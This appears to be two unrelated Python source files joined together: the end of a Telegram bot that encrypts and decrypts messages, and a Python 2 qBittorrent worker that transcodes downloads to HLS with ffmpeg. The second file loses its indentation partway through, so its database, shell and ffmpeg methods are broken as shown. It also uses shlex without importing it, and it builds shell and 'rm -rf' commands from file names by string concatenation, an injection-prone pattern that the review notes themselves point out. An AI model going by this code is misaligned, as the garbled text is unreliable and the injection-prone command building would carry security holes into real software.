        update.effective_message.reply_text('⚠️ We have processed your request, but our response is too long for the Telegram to handle. Please send a shorter message.')
        logbot(update, '⚠️ We have processed your request, but our response is too long for Telegram to handle. Please try a shorter message.')
    elif 'An existing connection was forcibly closed by the remote host' in str(context.error):
        #update.effective_message.reply_text('⚠️ Telegram closed the connection. Please try again.')
        #logbot(update, '⚠️ Telegram closed the connection. Please try again.')
        logger.info('existing connection closed (error exception catch temp code), pass')
        pass
    elif "'utf-8' codec can't decode byte 0xe7 in position 1: invalid continuation byte" in str(context.error):
        update.effective_message.reply_text('⚠️ Failed to decrypt. You probably used the wrong decryption key.')
        logbot(update, '⚠️ Failed to decrypt. You probably used the wrong decryption key.')
    else:
        if update.effective_message:
            text = "⚠️ An error occured, sorry for any inconvenience caused.\nThe developer has been notified and will look into this issue as soon as possible."
            update.effective_message.reply_text(text)
        # This traceback is created with accessing the traceback object from the sys.exc_info, which is returned as the
        # third value of the returned tuple. Then we use the traceback.format_tb to get the traceback as a string, which
        # for a weird reason separates the line breaks in a list, but keeps the linebreaks itself. So just joining an
        # empty string works fine.
        trace = "".join(traceback.format_tb(sys.exc_info()[2]))
        # lets try to get as much information from the telegram update as possible
        payload = ""
        # normally, we always have an user. If not, its either a channel or a poll update.
        if update.effective_user:
            payload += f' with the user {mention_html(update.effective_user.id, update.effective_user.first_name)}'
        # there are more situations when you don't get a chat
        if update.effective_chat:
            payload += f' within the chat <i>{update.effective_chat.title}</i>'
            if update.effective_chat.username:
                payload += f' (@{update.effective_chat.username})'
        # but only one where you have an empty payload by now: A poll (buuuh)
        if update.poll:
            payload += f' with the poll id {update.poll.id}.'
        # lets put this in a "well" formatted text
        text = f"⚠️⚠️⚠️ Error Report ⚠️⚠️⚠️\n\nThe error <code>{context.error}</code> occured{payload}. The full traceback:\n\n<code>{trace}" \
            f"</code>"
        # and send it to the dev
        context.bot.send_message(devid, text, parse_mode=ParseMode.HTML)
        # we raise the error again, so the logger module catches it. If you don't use the logger module, use it.
        # NOTE(review): a bare ``raise`` only works while an exception is being
        # handled; PTB invokes error handlers from inside its except block.
        raise
def stop_and_restart():
    """Stop the Updater, then exec a fresh copy of this script in place."""
    u.stop()
    interpreter = sys.executable
    os.execl(interpreter, interpreter, *sys.argv)
# Restart the bot
def restart(update, context):
    """Dev command /r: restart the bot process in place."""
    logusr(update)
    update.message.reply_text(f'{botName} is restarting...')
    # Restart from a thread so this handler can return first.
    Thread(target=stop_and_restart).start()
# Send a message to a specific user
def sendMsg(update, context):
    """Dev command /send: relay a message to a specific user.

    The first argument is either a numeric chat id or an @username
    (resolved through the userdata map); the rest is the message text.
    """
    logusr(update)
    processed = TcProcessor.commandArgs(update, context)
    if processed is None:  # bug fix: compare to None by identity, not ==
        logbotsend(update, context, '⚠️ Invalid syntax! <i>Make sure your spacing is correct</i>')
        helpCMD(update, context)
    elif processed[0] == 'too_long':
        logbotsend(update, context, f'⚠️ Sorry, your message is {processed[1]} characters over our length limit')
    else:
        user = processed[0]
        message = processed[1]
        # startswith() is safe on an empty string, unlike user[0].
        if user.startswith('@'):
            user = TcProcessor.find_key(userdata, user[1:])[0]
        context.bot.send_message(int(user), message)
        logbotsend(update, context, 'Message sent!')
# Respond to the '/start' command
def startCMD(update, context):
    """Handle /start: register/update the user and send the feature
    overview followed by the help screen."""
    logusr(update)
    updateUserData(update)
    botsend(update, context, f'''<b>{botName}</b> is a Telegram bot that can encrypt and decrypt messages to keep sensitive information private
Key Features:
- Encrypt messages
- Decrypt messages
- Customise your encryption key
''')
    logbot(update, '*start response*')
    helpCMD(update, context)
# Respond to an unknown command
def unknownCMD(update, context):
    """Reply to a command that has no registered handler."""
    logusr(update)
    reply = "Sorry, I didn't understand that command."
    logbotsend(update, context, reply)
# Respond to an invalid file upload
def invalidFiletype(update, context):
    """Tell the user file uploads are unsupported, then show the help."""
    logusr(update)
    reply = "Sorry, we can't encrypt or decrypt files."
    logbotsend(update, context, reply)
    helpCMD(update, context)
# Respond to the user entering a command when in debug mode
def debugINFO(update, context):
    """Tell the user the bot is in maintenance (debug) mode."""
    logger.info(f'[@{update.effective_user.username}][{update.effective_user.first_name} {update.effective_user.last_name}][U:{update.effective_user.id}][M:{update.effective_message.message_id}]: */command while in debug*')
    reply = "We're currently under maintenance, please try again later"
    logbotsend(update, context, reply)
# Respond to the '/help' command
def helpCMD(update, context):
    """Send the usage guide for the encrypt/decrypt commands."""
    logusr(update)
    updateUserData(update)
    botsend(update, context, f'''--= How to use {botName} =--
🔒 Encrypting Messages:
/encrypt <i>[key] [message]</i>
/encrypt 16_character_key This message will be encrypted
🔓 Decrypting Messages:
/decrypt <i>[key] [message]</i>
/decrypt 16_character_key F\\x97\\xf1!\\xda\\x0f)\\xbc\\x17\\x18\\xaa\\xbc\\x93)\\xf8\\x04e\\x1b\\x1c|\\xfd\\x8c\\x9d\\x87;.\\xd7A\\xf8X\\xeb\\xbb
<i>🔑 Encryption Key Criteria:</i>
1. <b>MUST</b> be 16 or 24 characters long <i>[If it is not, it will be converted]</i>
2. Cannot contain spaces''')
    logbot(update, '*Help information*')
# Respond to the '/mydata' command
def mydataCMD(update, context):
    """Handle /mydata: show the per-user record we keep (id, name,
    usage counters, time since last API call)."""
    logusr(update)
    if TcProcessor.authorised(update):
        updateUserDataNoTime(update)
        data=getUserData(update)
        user = update.effective_chat.id
        username = data["username"]
        name = data["name"]
        encrypts = data["encrypts"]
        decrypts = data["decrypts"]
        # Seconds elapsed since the user's last recorded API call.
        last_call = round(int(time.time()) - int(data["last_call"]))
        botsend(update, context, f'''Here is the data we have stored about you:
<b>User ID</b>: {user}
<b>Username</b>: @{username}
<b>Full Name</b>: {name}
<b>Encrypts</b>: {encrypts}
<b>Decrypts</b>: {decrypts}
<b>Last API Call</b>: {last_call} seconds ago
<i>We do not store more data than we need to, and never log messages or keys</i>
''')
        logbot(update, '*Sent user data*')
    else:
        # Rate-limited: ask the user to wait before calling again.
        TcProcessor.waitmsg(update, context)
# Respond to '/encrypt' and '/e' commands
def encrypt(update, context):
    """Handle /encrypt and /e: encrypt ``[key] [message]`` and reply with
    the ciphertext, the key, and the full decryption command."""
    logger.info(f'[@{update.effective_user.username}][{update.effective_user.first_name} {update.effective_user.last_name}][U:{update.effective_user.id}][M:{update.effective_message.message_id}]: */encrypt*')
    # Best-effort "typing..." indicator; Telegram occasionally drops the
    # request, so retry up to 10 times.
    for attempt in range(0, 10):
        try:
            logger.info('Encrypt: Attempting to send ChatAction.TYPING')
            context.bot.sendChatAction(chat_id=update.effective_chat.id, action=telegram.ChatAction.TYPING, timeout=10)
            logger.info('Encrypt: Successfully sent ChatAction.TYPING')
        except Exception:  # bug fix: bare except also caught KeyboardInterrupt
            logger.info('Encrypt: Failed to send ChatAction.TYPING')
            continue
        logger.info('Encrypt: Breaking from ChatAction loop')
        break
    updateUserDataNoTime(update)
    if TcProcessor.authorised(update):
        processed = TcProcessor.commandArgs(update, context)
        if processed is None:  # bug fix: identity comparison with None
            logbotsend(update, context, '⚠️ Invalid syntax! <i>Make sure your spacing is correct</i>')
            helpCMD(update, context)
        elif processed[0] == 'too_long':
            logbotsend(update, context, f'⚠️ Sorry, your message is {processed[1]} characters over our length limit')
        else:
            key = processed[0]
            message = processed[1]
            encoded = TcEncryptor.encrypt(key, message)
            addUserData(update, getUserData(update)["encrypts"]+1, getUserData(update)["decrypts"], round(time.time()))
            # Three separate replies: ciphertext, key, full command.
            update.message.reply_text(encoded[1])
            update.message.reply_text(encoded[0])
            update.message.reply_text(f'/decrypt {encoded[0]} {encoded[1]}')
            # encoded[2] is True on a successful round-trip check, otherwise
            # the (mis)decrypted preview text.
            if encoded[2] is True:
                integrity = 'Encryption validation: ✅ Success!\n<i>Your message will decrypt as expected</i>'
            else:
                integrity = f'Encryption validation: ❌ Failed!\n<i>Your message will <b>not</b> decrypt as expected</i>\n<b>This is usually caused by using unsupported characters</b>\n\n<b>Decrypted message preview:</b>\n{encoded[2]}'
            botsend(update, context, f'''<b>Message encrypted</b> 🔒
<u>You will find three messages above this one</u>
<b>1. 🔒 Encrypted Message</b>
<i>[Safe to share with anyone]</i>
<b>2. 🔑 Decryption Key</b>
<i>[Share only with the intended recipient]</i>
<b>3. 🔐 Full Decryption Command</b>
<i>[Not reccomended for sharing]</i>
<i>It is reccomended that you share your decryption key and encrypted message with the intended recipient on different platforms so that if one is compromised, the decrypted message is not exposed</i>
{integrity}
<i>Your encrypted message cannot be decrypted without the decryption key it was generated with</i>
You can send encrypted messages to other people on Telegram or even via email. They will need your 🔑 <b>decryption key</b> and will need to decrypt the message with this bot.
🔓 How to Decrypt Messages:
/decrypt <i>[key] [message]</i>
/decrypt 16_character_key F\\x97\\xf1!\\xda\\x0f)\\xbc\\x17\\x18\\xaa\\xbc\\x93)\\xf8\\x04e\\x1b\\x1c|\\xfd\\x8c\\x9d\\x87;.\\xd7A\\xf8X\\xeb\\xbb
<i>🔑 Encryption Key Criteria:</i>
1. <b>MUST</b> be 16 or 24 characters long <i>[If it is not, it will be converted]</i>
2. Cannot contain spaces''')
            # NOTE(review): hard-coded developer chat id.
            context.bot.send_message(838693333, f'User @{update.effective_user.username} encrypted a message!')
            logbot(update, '*Sent encrypt response*')
    else:
        TcProcessor.waitmsg(update, context)
# Respond to '/decrypt' and '/d' commands
def decrypt(update, context):
    """Handle /decrypt and /d: decrypt ``[key] [message]`` and reply with
    the plaintext."""
    logger.info(f'[@{update.effective_user.username}][{update.effective_user.first_name} {update.effective_user.last_name}][U:{update.effective_user.id}][M:{update.effective_message.message_id}]: */decrypt*')
    # Best-effort "typing..." indicator, retried up to 10 times.
    for attempt in range(0, 10):
        try:
            logger.info('Decrypt: Attempting to send ChatAction.TYPING')
            context.bot.sendChatAction(chat_id=update.effective_chat.id, action=telegram.ChatAction.TYPING, timeout=10)
            logger.info('Decrypt: Successfully sent ChatAction.TYPING')
        except Exception:  # bug fix: bare except also caught KeyboardInterrupt
            logger.info('Decrypt: Failed to send ChatAction.TYPING')
            continue
        logger.info('Decrypt: Breaking from ChatAction loop')
        break
    updateUserDataNoTime(update)
    if TcProcessor.authorised(update):
        processed = TcProcessor.commandArgs(update, context)
        if processed is None:  # bug fix: identity comparison with None
            logbotsend(update, context, '⚠️ Invalid syntax! <i>Make sure your spacing is correct</i>')
            helpCMD(update, context)
        elif processed[0] == 'too_long':
            logbotsend(update, context, f'⚠️ Sorry, your message is {processed[1]} characters over our length limit')
        else:
            key = processed[0]
            message = processed[1]
            decoded = TcEncryptor.decrypt(key, message)
            if decoded in ('not_multiple', 'not_valid'):
                logbotsend(update, context, '⚠️ Sorry, your encrypted message is not valid')
                helpCMD(update, context)
            else:
                addUserData(update, getUserData(update)["encrypts"], getUserData(update)["decrypts"]+1, round(time.time()))
                update.message.reply_text(decoded)
                botsend(update, context, f'''<b>Message Decrypted</b> 🔓
Your <b>decrypted message</b> can be found above this one for easy copy/pasting
🔒 How to Encrypt Messages:
/encrypt <i>[key] [message]</i>
/encrypt 16_character_key This message will be encrypted
<i>🔑 Encryption Key Criteria:</i>
1. <b>MUST</b> be 16 or 24 characters long <i>[If it is not, it will be converted]</i>
2. Cannot contain spaces''')
                # NOTE(review): hard-coded developer chat id.
                context.bot.send_message(838693333, f'User @{update.effective_user.username} decrypted a message!')
                logbot(update, '*Sent decrypt response*')
    else:
        TcProcessor.waitmsg(update, context)
debug = 0  # 0 = live mode (all handlers public); 1 = maintenance mode (dev-only)
dp.add_error_handler(error)
# Notify user of invalid file upload
dp.add_handler(MessageHandler(Filters.photo, invalidFiletype))
dp.add_handler(MessageHandler(Filters.video, invalidFiletype))
dp.add_handler(MessageHandler(Filters.audio, invalidFiletype))
dp.add_handler(MessageHandler(Filters.voice, invalidFiletype))
dp.add_handler(MessageHandler(Filters.document, invalidFiletype))
# Developer commands
dp.add_handler(CommandHandler('r', restart, filters=Filters.user(username=devusername)))
dp.add_handler(CommandHandler('send', sendMsg, filters=Filters.user(username=devusername)))
if debug == 0:
    dp.add_handler(CommandHandler('start', startCMD)) # Respond to '/start'
    dp.add_handler(CommandHandler('mydata', mydataCMD)) # Respond to '/mydata'
    dp.add_handler(CommandHandler('help', helpCMD)) # Respond to '/help'
    dp.add_handler(CommandHandler('encrypt', encrypt)) # Respond to '/encrypt'
    dp.add_handler(CommandHandler('e', encrypt)) # Respond to '/e'
    dp.add_handler(CommandHandler('decrypt', decrypt)) # Respond to '/decrypt'
    dp.add_handler(CommandHandler('d', decrypt)) # Respond to '/d'
elif debug == 1:
    dp.add_handler(CommandHandler('start', startCMD, filters=Filters.user(username=devusername))) # Respond to '/start'
    dp.add_handler(CommandHandler('mydata', mydataCMD, filters=Filters.user(username=devusername))) # Respond to '/mydata'
    dp.add_handler(CommandHandler('encrypt', encrypt, filters=Filters.user(username=devusername)))#
    dp.add_handler(CommandHandler('e', encrypt, filters=Filters.user(username=devusername)))
    dp.add_handler(CommandHandler('decrypt', decrypt, filters=Filters.user(username=devusername)))
    dp.add_handler(CommandHandler('d', decrypt, filters=Filters.user(username=devusername)))
    # NOTE(review): 'r' and 'send' were already registered above; these two
    # lines add duplicate handlers for them in debug mode.
    dp.add_handler(CommandHandler('r', restart, filters=Filters.user(username=devusername)))
    dp.add_handler(CommandHandler('send', sendMsg, filters=Filters.user(username=devusername)))
    dp.add_handler(MessageHandler(Filters.command, debugINFO)) # Notify user that we are in debug mode
# Plain text falls back to the help screen; unknown commands get a notice.
dp.add_handler(MessageHandler(Filters.text, helpCMD)) # Respond to text
dp.add_handler(MessageHandler(Filters.command, unknownCMD)) # Notify user of invalid command
logger.info('Loaded: Handlers')
logger.info('Loading Complete!')
u.start_polling()
u.idle()
qbittorrent_worker.py | #!/usr/bin/env python
# encoding: utf-8
"""
下载检测
"""
'''
pl_hash_list 表字段 status说明
0 视频资源 - 正常
1 不含有视频资源
2 3小时下载未反应
4 3个月未下载完成
'''
import hashlib
import os
import time
import datetime
import traceback
import sys
import json
import socket
import threading
from hashlib import sha1
from random import randint
from struct import unpack
from socket import inet_ntoa
from threading import Timer, Thread
from time import sleep
reload(sys)  # Python-2-only: re-import sys so setdefaultencoding is exposed
sys.setdefaultencoding("utf8")  # force UTF-8 as the implicit codec (py2 hack)
sys.path.append('/usr/local/lib/python2.7/site-packages')  # locate site packages
def formatTime():
    """Return the current local time as ``YYYY-MM-DD HH:MM:SS``."""
    now = time.localtime()
    return time.strftime("%Y-%m-%d %H:%M:%S", now)
def getRunDir():
    """Return the process's current working directory."""
    return os.getcwd()
def getRootDir():
    """Return the grandparent of the current working directory
    (the project root, two levels above the run dir)."""
    run_dir = os.getcwd()
    return os.path.dirname(os.path.dirname(run_dir))
def toSize(size):
    """Render a byte count as a human-readable string.

    Successively divides by 1024 through b/KB/MB/GB/TB and returns the
    first value below 1024, e.g. ``toSize(2048) == '2.0 KB'``.  Counts of
    a petabyte or more are still reported in TB.
    """
    units = ('b', 'KB', 'MB', 'GB', 'TB')
    for unit in units:
        if size < 1024:
            return str(round(size, 2)) + ' ' + unit
        size = float(size) / 1024.0
    # Fell off the end: size is already expressed in TB.
    # (The original kept a dead tracking variable `s`; removed.)
    return str(round(size, 2)) + ' ' + units[-1]
# import pygeoip
import MySQLdb as mdb
from configparser import ConfigParser
# Load runtime configuration.  Sections are addressed positionally, so
# ../qb.conf must keep its section order: db, qbittorrent, file, task, setting.
cp = ConfigParser()
cp.read("../qb.conf")
# --- database connection settings ---
section_db = cp.sections()[0]
DB_HOST = cp.get(section_db, "DB_HOST")
DB_USER = cp.get(section_db, "DB_USER")
DB_PORT = cp.getint(section_db, "DB_PORT")
DB_PASS = cp.get(section_db, "DB_PASS")
DB_NAME = cp.get(section_db, "DB_NAME")
# --- qBittorrent Web API settings ---
section_qb = cp.sections()[1]
QB_HOST = cp.get(section_qb, "QB_HOST")
QB_PORT = cp.get(section_qb, "QB_PORT")
QB_USER = cp.get(section_qb, "QB_USER")
QB_PWD = cp.get(section_qb, "QB_PWD")
# --- file output / transfer settings ---
section_file = cp.sections()[2]
FILE_TO = cp.get(section_file, "FILE_TO")
FILE_TRANSFER_TO = cp.get(section_file, "FILE_TRANSFER_TO")
FILE_OWN = cp.get(section_file, "FILE_OWN")
FILE_GROUP = cp.get(section_file, "FILE_GROUP")
FILE_ENC_SWITCH = cp.get(section_file, "FILE_ENC_SWITCH")
FILE_API_URL = cp.get(section_file, "FILE_API_URL")
FILE_ASYNC_SWITCH = cp.get(section_file, "FILE_ASYNC_SWITCH")
# --- task pacing / limits ---
section_task = cp.sections()[3]
TASK_SIZE_LIMIT = cp.get(section_task, "TASK_SIZE_LIMIT")
TASK_RATE = cp.getint(section_task, "TASK_RATE")
TASK_COMPLETED_RATE = cp.getint(section_task, "TASK_COMPLETED_RATE")
TASK_DEBUG = cp.getint(section_task, "TASK_DEBUG")
# --- qBittorrent queueing limits ---
section_setting = cp.sections()[4]
QUEUE_SWITCH = cp.get(section_setting, "QUEUE_SWITCH")
MAX_ACTIVE_UPLOADS = cp.getint(section_setting, "MAX_ACTIVE_UPLOADS")
MAX_ACTIVE_TORRENTS = cp.getint(section_setting, "MAX_ACTIVE_TORRENTS")
MAX_ACTIVE_DOWNLOADS = cp.getint(section_setting, "MAX_ACTIVE_DOWNLOADS")
# Prefer the bundled ffmpeg binary; fall back to the system install.
rooDir = getRootDir()
tmp_cmd = rooDir + "/lib/ffmpeg/ffmpeg"
if os.path.exists(tmp_cmd):
    ffmpeg_cmd = tmp_cmd
else:
    ffmpeg_cmd = "/usr/local/bin/ffmpeg"
class downloadBT(Thread):
    """Daemon thread that drives qBittorrent downloads and transcoding."""
    # Last database connection error (None while the connection is healthy).
    __db_err = None

    def __init__(self):
        Thread.__init__(self)
        self.setDaemon(True)
        # NOTE(review): this rebinds self.qb from the qb() factory method to
        # the client instance it returns, shadowing the method afterwards.
        self.qb = self.qb()
        self.qb.set_preferences(max_active_uploads=MAX_ACTIVE_UPLOADS)
        self.qb.set_preferences(max_active_torrents=MAX_ACTIVE_TORRENTS)
        self.qb.set_preferences(max_active_downloads=MAX_ACTIVE_DOWNLOADS)
        # Build the recognised video-extension list in both lower and upper
        # case.  NOTE(review): 'avi' appears twice in the base list.
        _has_suffix = ['mp4', 'rmvb', 'flv', 'avi',
                       'mpg', 'mkv', 'wmv', 'avi', 'rm']
        has_suffix = []
        for x in range(len(_has_suffix)):
            has_suffix.append('.' + _has_suffix[x])
            has_suffix.append('.' + _has_suffix[x].upper())
        self.has_suffix = has_suffix
        self.__conn()

    def __conn(self):
        # Open a fresh MySQL connection; record the error on failure.
        try:
            self.dbconn = mdb.connect(
                DB_HOST, DB_USER, DB_PASS, DB_NAME, port=DB_PORT, charset='utf8')
            self.dbconn.autocommit(False)
            self.dbcurr = self.dbconn.cursor()
            self.dbcurr.execute('SET NAMES utf8')
            return True
        except Exception as e:
            self.__db_err = e
            return False

    def __check(self):
        # Abort the process if a database error has ever been recorded.
        if self.__db_err:
            sys.exit('未连接数据库!')

    def __close(self):
        # Release the cursor and connection opened by __conn().
        self.dbcurr.close()
        self.dbconn.close()
def query(self, sql):
# 执行SQL语句返回数据集
if not self.__conn():
return self.__db_err
try:
self.dbcurr.execute(sql)
result = self.dbcurr.fetchall()
# print result
# 将元组转换成列表
data = map(list, result)
self.__close()
return data
except Exception, ex:
return ex
def execute(self, sql):
if not self.__conn():
return self.__db_err
try:
self.dbcurr.execute(sql)
self.dbcurr.execute('SELECT LAST_INSERT_ID();')
result = self.dbcurr.fetchone()
self.dbconn.commit()
self.__close()
return result[0]
except Exception, ex:
return ex
def qb(self):
from qbittorrent import Client
url = 'http://' + QB_HOST + ':' + QB_PORT + '/'
qb = Client(url)
qb.login(QB_USER, QB_PWD)
return qb
def execShell(self, cmdstring, cwd=None, timeout=None, shell=True):
import subprocess
if shell:
cmdstring_list = cmdstring
else:
cmdstring_list = shlex.split(cmdstring)
if timeout:
end_time = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
sub = subprocess.Popen(cmdstring_list, cwd=cwd, stdin=subprocess.PIPE,
shell=shell, bufsize=4096, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
while sub.poll() is None:
time.sleep(0.1)
if timeout:
if end_time <= datetime.datetime.now():
raise Exception("Timeout:%s" % cmdstring)
return sub.communicate()
def md5(self, str):
# 生成MD5
try:
m = hashlib.md5()
m.update(str)
return m.hexdigest()
except:
return False
def readFile(self, filename):
# 读文件内容
try:
fp = open(filename, 'r')
fBody = fp.read()
fp.close()
return fBody
except:
return False
    def get_transfer_ts_file(self, to):
        # Intermediate .ts path for the given file-content hash.
        return FILE_TRANSFER_TO + '/' + to + '.ts'

    def get_transfer_mp4_file(self, to):
        # Intermediate .mp4 path for the given file-content hash.
        return FILE_TRANSFER_TO + '/' + to + '.mp4'

    def get_transfer_m3u5_dir(self, dirname, fname):
        # Output directory for one transcoded file under its torrent hash.
        return FILE_TO + '/m3u8/' + dirname + '/' + fname

    def get_transfer_hash_dir(self, dirname):
        # Output directory for a whole torrent hash.
        return FILE_TO + '/m3u8/' + dirname

    def fg_transfer_mp4_cmd(self, sfile, dfile):
        # ffmpeg command: re-encode the source to H.264 mp4 (single thread,
        # crf 28, veryslow preset).
        cmd = ffmpeg_cmd + ' -y -i "' + sfile + \
            '" -threads 1 -preset veryslow -crf 28 -c:v libx264 -strict -2 ' + dfile
        return cmd

    def fg_transfer_ts_cmd(self, file, to_file):
        # ffmpeg command: repackage the mp4 as a 480x360 MPEG-TS stream.
        cmd = ffmpeg_cmd + ' -y -i ' + file + \
            ' -s 480x360 -vcodec copy -acodec copy -vbsf h264_mp4toannexb ' + to_file
        return cmd

    def fg_m3u8_cmd(self, ts_file, m3u8_file, to_file):
        # ffmpeg command: split a TS file into 3-second HLS segments.
        cmd = ffmpeg_cmd + ' -y -i ' + ts_file + ' -c copy -map 0 -f segment -segment_list ' + \
            m3u8_file + ' -segment_time 3 ' + to_file
        return cmd

    def fg_m3u8enc_cmd(self, ts_file, m3u8_file, to_file, enc_dir):
        # ffmpeg command: AES-encrypted HLS, key info read from
        # enc_dir/enc.keyinfo.txt.
        cmd = ffmpeg_cmd + ' -y -i ' + ts_file + ' -threads 1 -strict -2 -hls_time 3 -hls_key_info_file ' + \
            enc_dir + '/enc.keyinfo.txt -hls_playlist_type vod -hls_segment_filename ' + \
            to_file + ' ' + m3u8_file
        return cmd
    def debug(self, msg):
        # Timestamp-prefixed console line.
        return formatTime() + ":" + msg

    def get_lock_file(self, to):
        # Lock-file path for the given sign (e.g. 'sync').
        return '/tmp/mdw_qb_' + to + '.lock'

    def lock(self, sign):
        # Create the lock file via shell touch.
        l = self.get_lock_file(sign)
        self.execShell('touch ' + l)

    def unlock(self, sign):
        # Remove the lock file.
        l = self.get_lock_file(sign)
        self.execShell('rm -rf ' + l)

    def islock(self, sign):
        # True while the lock file exists.  NOTE(review): check-then-act is
        # not atomic -- two workers could both pass this test.
        l = self.get_lock_file(sign)
        if os.path.exists(l):
            return True
        return False
    def ffmpeg_file_sync(self):
        # Push transcoded files to remote storage via rsync.sh, guarded by a
        # 'sync' lock so only one sync runs at a time.  No-op unless the
        # FILE_ASYNC_SWITCH config flag is '1'.
        if FILE_ASYNC_SWITCH == '1':
            runDir = getRunDir()
            sign = 'sync'
            print 'file_sync... start'
            if self.islock(sign):
                print self.debug('sync doing,already lock it!!!')
            else:
                self.lock(sign)
                r = self.execShell('sh -x ' + runDir + '/rsync.sh')
                print self.debug('file_sync:' + r[0])
                print self.debug('file_sync_error:' + r[1])
                self.unlock(sign)
            print 'file_sync... end'

    def ffmpeg_del_file(self, mp4, ts, m3u8_dir):
        # Remove the intermediate mp4/ts transcode files; the m3u8 output
        # directory is deliberately kept (deletion commented out below).
        print self.debug('delete middle file ... start ' + mp4)
        self.execShell('rm -rf ' + mp4)
        self.execShell('rm -rf ' + ts)
        print self.debug('delete middle file ... end ' + ts)
        # if os.path.exists(m3u8_dir):
        # self.execShell('rm -rf ' + m3u8_dir)

    def ffmpeg_del_hfile(self, shash_dir):
        # Intentionally a no-op: hash-directory deletion is disabled.
        pass
        # print self.debug('delete middle hash dir ... start ' + shash_dir)
        # if os.path.exists(shash_dir):
        # self.execShell('rm -rf ' + shash_dir)
        # print self.debug('delete middle hash dir ... end ' + shash_dir)
# Full transcode pipeline for one source video:
#   source -> mp4 (re-encode) -> ts (remux) -> HLS segments (+ optional
#   AES-128 encryption), then register the result in the database, fix
#   ownership/permissions, sync to storage and delete intermediates.
# NOTE(review): every shell command is built by string concatenation from
# file names -- a file name containing shell metacharacters breaks the
# command (and is an injection risk). Consider subprocess with list args.
def ffmpeg(self, file=''):
if not os.path.exists(FILE_TRANSFER_TO):
self.execShell('mkdir -p ' + FILE_TRANSFER_TO)
fname = os.path.basename(file)
shash = self.sign_torrent['hash']
md5file = self.md5(file)
if not os.path.exists(file):
print formatTime(), 'file not exists:', file
return
print self.debug('source file ' + file)
# Stage 1: re-encode the source to mp4 (skipped if already present).
mp4file = self.get_transfer_mp4_file(md5file)
cmd_mp4 = self.fg_transfer_mp4_cmd(file, mp4file)
if not os.path.exists(mp4file):
print self.debug('cmd_mp4:' + cmd_mp4)
os.system(cmd_mp4)
else:
print self.debug('mp4 exists:' + mp4file)
if not os.path.exists(mp4file):
print self.debug('mp4 not exists')
return
# Stage 2: remux the mp4 into an MPEG-TS stream.
tsfile = self.get_transfer_ts_file(md5file)
cmd_ts = self.fg_transfer_ts_cmd(mp4file, tsfile)
if not os.path.exists(tsfile):
print self.debug('cmd_ts:' + cmd_ts)
os.system(cmd_ts)
else:
print self.debug('data_ts exists:' + mp4file)
if not os.path.exists(tsfile):
print self.debug('ts not exists')
return
# Stage 3: segment into HLS under <torrent-hash>/<md5(name)>/.
md5Fname = self.md5(fname)
m3u8_dir = self.get_transfer_m3u5_dir(shash, md5Fname)
if not os.path.exists(m3u8_dir):
self.execShell('mkdir -p ' + m3u8_dir)
m3u8_file = m3u8_dir + '/index.m3u8'
tofile = m3u8_dir + '/%010d.ts'
print self.debug('tofile:' + tofile)
# Encrypted m3u8 (AES-128 HLS) branch.
if FILE_ENC_SWITCH != '0':
enc_dir = '/tmp/qb_m3u8'
cmd = self.fg_m3u8enc_cmd(tsfile, m3u8_file, tofile, enc_dir)
if os.path.exists(m3u8_file):
# Playlist already produced earlier: only sync and clean up.
print self.debug('cmd_m3u8_enc exists:' + m3u8_file)
print self.debug('cmd_m3u8_enc:' + cmd)
self.ffmpeg_file_sync()
self.ffmpeg_del_file(mp4file, tsfile, m3u8_dir)
return
# Generate a fresh AES key and key-info file for ffmpeg.
self.execShell('mkdir -p ' + enc_dir)
self.execShell('openssl rand -base64 16 > ' +
enc_dir + '/enc.key')
self.execShell('rm -rf ' + enc_dir + '/enc.keyinfo.txt')
try:
fid = self.add_hash(fname, md5Fname)
except Exception as e:
print 'add_hash_enc:' + str(e)
return
# NOTE(review): duplicate call -- add_hash() was already invoked in
# the try block above; this second call repeats the DB round-trip.
fid = self.add_hash(fname, md5Fname)
key = self.readFile(enc_dir + '/enc.key').strip()
self.set_hashfile_key(fid, key)
# FILE_API_URL
url = FILE_API_URL.replace('{$KEY}', fid)
enc_url = 'echo ' + url + ' >> ' + enc_dir + '/enc.keyinfo.txt'
self.execShell(enc_url)
enc_path = 'echo ' + enc_dir + '/enc.key >> ' + enc_dir + '/enc.keyinfo.txt'
self.execShell(enc_path)
enc_iv = 'openssl rand -hex 16 >> ' + enc_dir + '/enc.keyinfo.txt'
self.execShell(enc_iv)
os.system(cmd)
else:
# Unencrypted HLS branch.
if os.path.exists(m3u8_file):
print self.debug('m3u8 exists:' + tofile)
if TASK_DEBUG == 0:
self.ffmpeg_file_sync()
self.ffmpeg_del_file(mp4file, tsfile, m3u8_dir)
else:
cmd_m3u8 = self.fg_m3u8_cmd(tsfile, m3u8_file, tofile)
print self.debug('cmd_m3u8:' + cmd_m3u8)
os.system(cmd_m3u8)
try:
self.add_hash(fname, md5Fname)
except Exception as e:
print 'add_hash', str(e)
# Make output readable by the web server, then sync and clean up.
self.execShell('chown -R ' + FILE_OWN + ':' +
FILE_GROUP + ' ' + m3u8_dir)
self.execShell('chmod -R 755 ' + m3u8_dir)
if TASK_DEBUG == 0:
self.ffmpeg_file_sync()
self.ffmpeg_del_file(mp4file, tsfile, m3u8_dir)
def get_bt_size(self, torrent):
    """Return the torrent's size in bytes as a string.

    Prefers 'total_size' over 'size' (checked last wins), defaulting to
    '0' when neither field is present.
    """
    result = '0'
    for key in ('size', 'total_size'):
        if key in torrent:
            result = str(torrent[key])
    return result
# Return the pl_hash_list row id for the current torrent, inserting a new
# row (name, info_hash, length, create_time) if it does not exist yet.
# NOTE(review): SQL is built by string concatenation; only `sname` is
# escaped -- prefer parameterized queries throughout.
def get_hashlist_id(self):
ct = formatTime()
total_size = self.get_bt_size(self.sign_torrent)
shash = self.sign_torrent['hash']
sname = self.sign_torrent['name']
sname = mdb.escape_string(sname)
info = self.query(
"select id from pl_hash_list where info_hash='" + shash + "'")
if len(info) > 0:
pid = info[0][0]
else:
print 'insert into pl_hash_list data'
pid = self.execute("insert into pl_hash_list (`name`,`info_hash`,`length`,`create_time`) values('" +
sname + "','" + shash + "','" + total_size + "','" + str(ct) + "')")
return pid
# Upsert the status of *torrent* in pl_hash_list: update the row when the
# info_hash exists, otherwise insert a new row carrying the status.
# NOTE(review): string-built SQL; parameterize if this code is revisited.
def set_hashlist_status(self, torrent, status):
ct = formatTime()
shash = torrent['hash']
info = self.query(
"select id from pl_hash_list where info_hash='" + shash + "'")
if len(info) > 0:
print 'set_hashlist_status update'
usql = "update pl_hash_list set `status`='" + \
str(status) + "' where info_hash='" + shash + "'"
self.execute(usql)
else:
